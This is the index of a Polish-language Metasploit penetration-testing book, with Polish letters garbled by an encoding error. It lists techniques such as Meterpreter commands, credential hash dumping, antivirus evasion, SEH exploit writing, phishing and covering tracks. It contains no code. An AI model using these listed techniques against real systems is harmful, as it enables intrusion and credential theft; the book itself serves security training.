
atakowanienietypowych usug, 326sieci bezprzewodowych, 236

automatyczna migracja procesu,161

automatyczne przej�ciesystemu, 89

awaria systemu, 90

Bbackdoor, 28baza danych, 49bezprzewodowy wektor ataku,

208

352 S k o r o w i d z

biay wywiad, 44biblioteka

oledlg.dll, 288SHELL32.DLL, 278user32.dll, 137

biblioteki rdzenia, 240bind shell, 34b�dny adres zwrotny, 275b�dy formatu plików, 163budowa moduu pomocniczego,

173bufor Quick TFTP, 287

Ccel ataku, 44certyfikat SVN, 339ci�g znaków, string, 246CVE, Common Vulnerabilities

and Exposures, 74czynno�ci wst�pne, pre-

engagement interactions, 26

Ddebuger Immunity Debugger,

256debugery, 155, 255DEP, Data Execution

Prevention, 100dugo�� bufora, 264dodatek Railgun, 137domieszka

Msf::Exploit::Remote::Tcp,62

Msf::Auxiliary::Scanner, 62Msf::Exploit::Remote::Tcp,

275Msf::Exploit::Remote::Udp,

285Msf::Exploit::Remote::Seh,

285domieszki, mixins, 62domieszki Meterpretera, 302dostarczanie adunku, 116dost�p do

interfejsu API, 137maszyny docelowej, 191Metasploit Framework, 36plików pomocy, 35

powoki, 233, 289, 324powoki Meterpretera, 112,

204, 220prze�cznika, 61serwera MS SQL, 116systemu, 125, 193wektora ataku

man-left-in-the-middle, 197tabnabbing, 196

dzielenie adunku, 246dzienniki zdarze�, 329

Eegg hunter, 258EIP, extended instruction

pointer, 272eksploatacja, exploitation, 27,

317eksploatacja systemów, 91eliminowanie zych znaków, 267emulacja klawiatury, 204ESP, extended starter pointer,

272exploit, 34

Aurora, 158, 193Collab.collectEmailInfo, 184MS08-067, 99nadpisania rekordu SEH,

283Quick TFTP Pro 2.1, 283tomcat_mgr_deploy, 324

exploityAdobePDF, 181przegl�darek, browser-

based exploits, 152typu client-side, 151, 192

Ffaszywy

punkt dost�pu, 208, 227, 232serwer pocztowy, 233

Fast-Track, 209–225faza

eksploatacji, 317poeksploatacyjna, 28, 319

fazy PTES, 26fikcyjny kod powoki, 277

fingerprinting, 30Fu, 347funkcja

event_manager, 328generate_seh_payload, 288Kontroli Konta

U�ytkownika, 309load auto_add_route, 318payload.encoded, 281powershell_upload_exec,

245PUT HTTP, 324RATTE, 207szyfrowania, 61timestomp, 328tworzenia adunku, 298

fuzz string, 253fuzz testing, 251fuzzery Wi-Fi, 169fuzzing, 252fuzzowanie aplikacji, 251

Ggenerator zmiany formatu, 222generowanie

kodu powoki, 39nazwy pliku, 246

gniazdo, socket, 286GUI, 38

Hhasa community string, 61heap spraying, 153HID, human interface device,

204

IICMP, Internet Control

Message Protocol, 47IDE, Integrated Drive

Electronics, 206identyfikacja zo�liwego kodu,

139identyfikator

adresu IP, 45, 51procesu PID, 294, 299

S k o r o w i d z 353

IDS, intrusion detectionsystems, 40

iframe injection, 193IMAP, Internet Message Access

Protocol, 252implementowanie funkcji

Metasploit Framework, 278importowanie

exploitów, 271, 274exploita SEH, 289raportu, 73, 80

informacje oadowaniu, 233ruchu sieciowym, 133sieci, 45systemie, 133

instalacja Windows XP, 333instrukcja

NOP, 154, 272NOP slide, 272POP, 283rand_text_alpha_upper, 280RENT, 283

instrukcjeasemblera, 156powoki wi�zanej, 157

interaktywna powoka, 207interfejs

API Meterpretera, 300Arduino, 206armitage, 38at0, 230graficzny u�ytkownika, 38IDE, 206msfcli, 36wiersza polece�, 36

interfejsy Metasploit, 35IP spoofing, 51IPS, intrusion prevention

systems, 152

Jjawne testy penetracyjne, 29JDK, Java Development Kit,

181j�zyk

Pearl, 21PowerShell, 242Ruby, 21, 309

KKARMA, 227Karmetasploit, 227–236karta bezprzewodowa, 229keystroke logging, 118klasa auxiliary, 174klonowanie strony, 192, 197klucz

HKEY_CURRENT_USER,133

klucze rejestru, 134kod

powoki, shellcode, 34, 39,155, 276

wasnego moduu, 281koder Power PC, 142kodery, 40kodowanie

adunku, 149adunku MSF, 143polece�, 247polimorficzne, 144shikata_ga_nai, 144

kody operacji, opcodes, 40kolejno�� bajtów, 262, 278komenda, Patrz poleceniekomponent

airbase-ng, 230UAC, 309

kompresor UPX, 149kompresowanie zo�liwych

plików, 150komunikat b�du, 245, 316konfiguracja

adresu IP, 335Karmetasploit, 228, 231Nessus, 76

polityka skanowania, 77raporty, 80

NeXpose, 68–72raporty, 71skanowanie r�czne, 70�rodowisko, site, 68

pakietu SET, 180punktu dost�powego, 230serwera SQL, 334serwera WWW, 333urz�dzenia Teensy, 207

konfigurowanie definicjiexploita, 276

konsola MSFconsole, 35konto

sa, 114, 238z ograniczonymi

uprawnieniami, 309kontrolowanie SEH, 256, 258konwertowanie plików

binarnych, 238

Lliczba

luk, 74w�tków, 57

liczniki, counters, 247link do strony sklonowanej, 198lista

dost�pnych ataków, 216uruchomionych procesów,

294luka

Adobe Flash zero-day, 152Collab.collectEmailInfo, 184MS08-067, 56, 93typu zero-day, 192w WebDAV, 172

luki w zabezpieczeniach, 66

�adunek, payload, 34

binarny, 140binarny MSF, 237odwróconego Meterpretera,

193odwrócony, 96, 106, 164payload.exe, 123payload3.exe, 149penego tunelowania, 207powoki polece�, 135reverse_tcp, 102sprawdzaj�cy porty, 106wielokrotnie zakodowany,

145a�cuch URL, 211�czenie si�

bez uwierzytelniania, 88z baz�, 49z VNC, 87ze zdalnym hostem, 62

354 S k o r o w i d z

Mmaszyny wirtualne, 313, 332mened�er zabezpiecze� kont, 121menu

Fast-Track, 210SET, 184

Metasploit Express, 21, 41Metasploit Pro, 21, 41Metasploitable, 313Meterpreter, 102, 111metoda send_request_cgi, 175migracja procesu, 132, 235modelowanie zagro�e�, threat

modeling, 27, 315modu, module, 34

Aurora, 159dns_enum, 169energizer_duo_detect, 169enumeracji DNS, 169ftp_version, 59hashdump, 120ipidseq, 51keylog_recorder, 119migrate, 132mssql_exec, 239mssql_login, 114, 115mssql_payload, 117mssql_ping, 58, 114mssql_powershell, 237multi/handler, 141portscan syn, 55smb_login, 85smb_version, 56snmp_enum, 60snmp_login, 61ssh_version, 58webdav_scanner, 169wewn�trzny serwera, 316zbierania informacji, 188

moduyfazy poeksploatacyjnej, 135pomocnicze, 167–178

modyfikowanie exploita, 274MSF, Metasploit Framework,

33, 347MSFcli, 36MSFconsole, 35MSFencode, 40, 142MSFpayload, 39MySQL, 49

Nnadpisanie SEH, 257, 283, 286narz�dzia

Metasploit, 38socjotechniczne, 179zautomatyzowane, 225

narz�dzieAutopwn, 89, 210Burp Suite, 316DistCC, 326do amania hase, 121event_manager, 329Fast-Track, 115, 209, 317,

336incognito, 126Interactive Shell, 207Metasploit, 316Meterpreter, 102msfencode, 142, 146msfpayload, 140msfvenom, 150, 348MSSQL Bruter, 215MSSQL Injector, 211nasm_shell.rb, 40netcraft, 45nmap, 47, 99, 112nslookup, 46Social-Engineer Toolkit,

336SQL Injector, 211SQLPwnage, 219, 318vncviewer, 86Web-GUI, 208Wireshark, 133xspy, 89

nasuchiwacz, listener, 34, 318multi-handler, 164odwróconego Meterpretera,

190nasuchiwanie po�cze�

odwróconych, 141Nasm Shell, 40NAT, Network Address

Translation, 55Ninja, 347NOP slide, 153NOP, no-operation instruction,

153notacja CIDR, 53NSEH, Next SE Handler, 286

Oobsuga

b�dów, 176nasuchiwania, 146po�cze�, 297routingu, 130w�tków, 255WebDAV, 172wyj�tków, 283znaków CRLF, 246

odcisk palca, fingerprint, 59, 65odmowa �wiadczenia usug, 253ograniczenia SEH, 258ograniczenie wykonywania

plików, 247okno konfiguracji polityki

skanowania, 77opcja

allports, 108AUTO_DETECT, 181Follow address in stack, 256Java Repeater, 203LHOST, 122LPORT, 102Mass Email Attack, 184RHOST, 122RHOSTS, 52SRVHOST, 160

opcjaTHREADS, 52View/SEH chain, 256

opcjeexploita, 37msfencode, 142nmap, 47skanowania ipidseq, 51

OSINT, open sourceintelligence, 44

ostrze�enie oniebezpiecze�stwie, 203

otwarte porty, 54otwieranie powoki, 147

Ppakiet

Aircrack-ng, 230JDK, 181KARMA, 227SET, 179–208

S k o r o w i d z 355

password cracker, 121pasywne zbieranie informacji,

46PE, Portable Executable, 141pivoting, 55, 127plik

autoexploit.rc, 109autorun.inf, 204calc.exe, 347dhcpd.conf, 228karma.rc, 229messages, 232mssql.rb, 240, 244, 248mssql_commands.rb, 241mssql_powershell.rb, 242payload2.exe, 144resource.rc, 109Subnet1.xml, 50surgemail.exe, 259, 261WScript, 205

pliki.pcap, 133.pde, 206.vmx, 332maszyny wirtualnej, 332PDF, 186pliki zasobów, resource

files, 108podgl�d pulpitu, 131podmiana

ramek iframe, 197stron, 196

podpis apletu, 187podszywanie si� pod adres IP,

51polecenia

Meterpretera, 117, 301, 348MSFcli, 347MSFconsole, 341MSFencode, 346MSFpayload, 346

polecenie./fast-track.py -i, 209./set-web, 208add_group_user, 127airmon-ng start wlan0, 229background, 124db_autopwn, 89db_autopwn –h, 90db_connect, 73db_destroy, 82

db_hosts, 50, 57, 75db_import, 50, 73, 89db_nmap, 53db_services, 54db_status, 49db_vulns, 75debug, 245EHLO, 276exploit, 103, 130getsystem, 124, 163getuid, 125help, 74info, 97, 163irb, 300jmp esp, 40load auto_add_route, 130,

321load nessus, 82load nexpose, 74migrate, 119, 162msf> show auxiliary, 92msf> show exploits, 92msf> show options, 92msf> show payloads, 94msf> show targets, 96msfcli -h, 36msfconsole, 35msfencode -h, 40, 142msfpayload -h, 39msfpescan, 261mssql_ping, 114nessus_connect, 82nessus_policy_list, 82nessus_report_get, 83nessus_report_list, 83nessus_scan_new, 83nessus_scan_status, 83net user, 123netstat -an, 158netstat -antp, 326nexpose_connect -h, 75nexpose_scan, 75nmap, 47ping, 47ps, 119, 125, 294resource, 108resource karma.rc, 231route, 128route print, 128run, 293

run get_local_subnets, 128run hashdump, 132run screen_unlock, 131save, 98screenshot, 117search, 93search scanner/http, 170sessions, 103, 135set, 97setg, 98shell, 103show, 92show advanced, 161show auxiliary, 168show options, 103, 244show targets, 102show_options, 85steal_token, 126sudo, 309sysinfo, 118unset, 97unsetg, 98use multi/handler, 134use priv, 121, 124, 163version, 109

polityka skanowania, scanpolicy, 77

po�czenieodwrócone, 133zwrotne, 102, 347

pomoc msfconsole, 35port

nasuchiwania serwera, 57serwera SQL, 113

portal dost�powy do sieci Wi-Fi, 233

porty usug, 107POST parameter attack, 212PostgreSQL, 49potwierdzanie logowania SMB,

84poufne informacje, 195PowerShell, 242powoka

irb, 137Ruby, 137wi�zania, 106, 155

poziom uprawnie�, 123procedura skadowana

xp_cmdshell, 115, 238, 241procedury skadowane, 212

356 S k o r o w i d z

procesexplorer.exe, 119iexplorer.exe, 295surgemail.exe, 254

programbrute-forcer, 115Encase, 328Immunity Debugger, 155LAN Manager, 120NT LAN Manager, 120NT LAN Manager v, 120multi-handler, 146obsugi nasuchiwacza, 124

programyantywirusowe, 132, 139kompresuj�ce, 149

protokóICMP, 47IMAP, 252RDP, 319SMTP, 323SNMP, 60SSH, 58SSL, 61TFTP, 285UDP, 57

przechwytywaniebanerów, 27, 66, 322pakietów, 133plików cookie, 233uderze� klawiatury, 118

przekierowanie portów, 181przepenianie

bufora, buffer overflow, 252,273

sterty, heap overflow, 130stosu, 251

przesyanie adunku, 164przydzielanie adresów IP, 231przygotowanie raportu,

reporting, 28PTES, Penetration Testing

Execution Standard, 25Pulpit zdalny, 320punkt przerwania, 157, 263punkt wstrzykni�cia SQL, 212puste hasa, 86puste instrukcje, 153

Rrandomizacja, 279raporty, 71, 80RATTE, 207RDP, Remote Desktop Protoco,

319rejestr

EIP, 272, 277ESP, 272

rejestrator pakietów, 133rejestrowanie klawiatury, 89, 118rejestry, 272rekord SEH, 261reverse shell, 34RO, read-only, 60rozmiary adunków, 260RPC, Remote Procedure Call,

111RW, read/write, 60

SSAM, Security Account

Manager, 121scrapowanie systemu, 133SEH, Structured Exception

Handler, 255, 283sekwencja POP-POP-RETN,

261, 263sekwencyjne identyfikatory IP,

51serwer

Apache Tomcat, 323Autopwn, 229browser_autopwn, 229DHCP, 230, 332DNS, 45MS SQL, 57pocztowy, 46POP3, 232proxy, 178Samba, 104SNMP, 60SQL, 113, 336SSH, 58VNC, 86WWW, 66WWW Python, 181X11, 88

SET, Social-Engineer Toolkit,179, 336

skanerNessus, 76NeXpose, 67OpenVAS, 89open_x11, 88scanner/portscan/tcp, 130SMB Login Check Scanner,

84smb_version, 57VNC, 86VNC Authentication None,

86vnc_auth, 88

skaneryluk w zabezpieczeniach, 30niestandardowe, 61portów, 167wyspecjalizowane, 84znaczników usug, 167

skanowaniebloku wiadomo�ci serwera,

56FTP, 59jaowe TCP, 51luk w zabezpieczeniach, 65niepo�wiadczone, 74portów, 47, 54, 130, 321,

326po�wiadczone, 74serwera SSH, 58sieci, 319skryte TCP, 47systemu Metasploitable, 321ukierunkowane, targeted

scan, 56za pomoc� wtyczki, 82

skokdo fikcyjnego kodu powoki,

279short jump, 259, 288

skrót hasa, 120, 132skrypt

getgui, 320multi_meter_inject, 294packetrecorder, 133persistence, 133PowerShell, 238scraper, 133

S k o r o w i d z 357

skrypty Meterpretera, 131, 293,304

SMB, Server Message Block, 56SNMP, Simple Network

Management Protocol, 60socjotechnika, 179spear-phishing, 163spryskiwanie sterty, heap

spraying, 153SQL injection, 29, 210SSH, Secure Shell, 58SSL, Secure Sockets Layer, 61standard PTES, 25, 64strona sklonowana, 199strony �ródowe HTTP, 196sygnatury, signatures, 139system

Back|Track, 44Linux, 128Ubuntu, 104Windows XP, 128

systemydetekcji wama�, 40, 152,

288IDS, 288przekazywania obrazu, 86

szablonboilerplate, 242pliku wykonywalnego, 146

szyfrowanie w HTTP, 207

��ledzenie porz�dku pakietów,

51�ledzenie ruchu, 133

Ttablica BadChars, 266tabnabbing, 196technika pass-the-hash, 122test

„biaego kapelusza”, 29penetracyjny, 313

testowanie exploita, 276testy

jawne, 29penetracyjne, 25, 30, 330ukryte, 30

t�czowe tablice, rainbow tables,120

TFTP, Trivial File TransferProtocol, 285

tokenihazdomainadmin, 127Kerberos, 125

tokeny personifikacji, 125transfery stref, 45tryb pracy karty

bezprzewodowej, 229tunel zwrotny RDP, 320tunelowanie, 131tworzenie

bazy danych, 73faszywego punktu dost�pu,

230klonu strony, 197moduu, 241pliku wykonywalnego, 306polityki skanowania, 77skryptu Meterpretera, 304sygnatur, 146wasnych exploitów, 251wasnych moduów, 237

tylne drzwi, backdoor, 28typy

testów penetracyjnych, 29wstrzykni�cia SQL, 219

UUAC, 309UAC Safe, 309UI, user interface, 301ukryte testy penetracyjne, 30unieruchamianie

oprogramowaniaantywirusowego, 132

unikanie wykrycia, 139uprawnienia, 123uprawnienia na poziomie

systemu, 116uruchamianie

agenta, 133armitage, 38exploita, 192, 249exploita powoki, 243adunku, 37, 147maszyn wirtualnych, 332

Metasploita, 190Nessusa, 79NeXpose, 74Nmap, 53procedury xp_cmdshell, 241skryptu, 131

urz�dzenieTeensy USB HID, 205USB, 206

usugaRPC, 111SQL Server Browser, 336SQL Server Service, 336

usugi podatne na ataki, 322ustawienia domy�lne

prze�cznika, 61usuwanie

agenta, 133fikcyjnego kodu powoki,

280NOP slide, 280VBScript, 134

uwierzytelnianieVNC, 86w trybie mieszanym, 215

uzyskiwanie adresu zwrotnego,261

VVMware Player, 332VMware Server, 332VNC, virtual network

computing, 86

Wwarto�� skrótu, hash values, 118wektor ataku, attack vector, 180

spear-phishing, 181Teensy USB HID, 204wieloaspektowego, 199

wektory ataków WWW, Webattack vectors, 187

wi�zanie, bind, 133wielokrotne

kodowanie, multi-encoding,144

zapytania, 203

358 S k o r o w i d z

wiersz polece�, 36wstrzykiwanie r�czne, 213wstrzykni�cie

agenta, 133kodu SQL, 210ramki iframe, 193zapytania SQL, SQL

injection, 29wtyczka

Nessus Bridge, 81--script=smb-check-vulns,

100sounds, 108

wykrywanieb�dów, 168adunku, 142otwartych portów, 314wersji systemu, 112

wyniki skanowania, 67wyodr�bnienie skrótów, 120wyszukiwanie whois, 44, 45wy�wietlanie komunikatów, 300wywoania API, 137, 301

Zzabezpieczenie DEP, 100zacieranie �ladów, 327zainfekowane no�niki danych,

204zainfekowany plik PDF, 186zakres

adresów, 53portów, 107

zamiatanie SNMP, 60zapytania sparametryzowane,

212zatruwanie pami�ci podr�cznej,

224zbieranie

informacji, intelligencegathering, 26, 64, 314aktywne, 47pasywne, 44po�rednie, 44

nazw u�ytkowników, 194po�wiadcze�, harvesting,

194, 232zdalne wykonywanie kodu, 266zestaw instrukcji JMP, 272zjazd, slide, 272ze znaki, bad characters, 266

zo�liwakontrolka ActiveX, 235strona, 191

zo�liwee-maile, 152oprogramowanie, malware,

327pliki, 163

zo�liwyaplet Javy, 187, 203bufor, 276link, 152serwer WWW, 198

zmiana formatu, 222zmienna cmd, 241znak

apostrofu, 316pionowej kreski, 63

znaki CRLF, 246zrandomizowany bufor, 281zrzut ekranu

pulpitu, 117z maszyny docelowej, 202

zwi�kszanie uprawnie�, 123,163

http://program-partnerski.helion.pl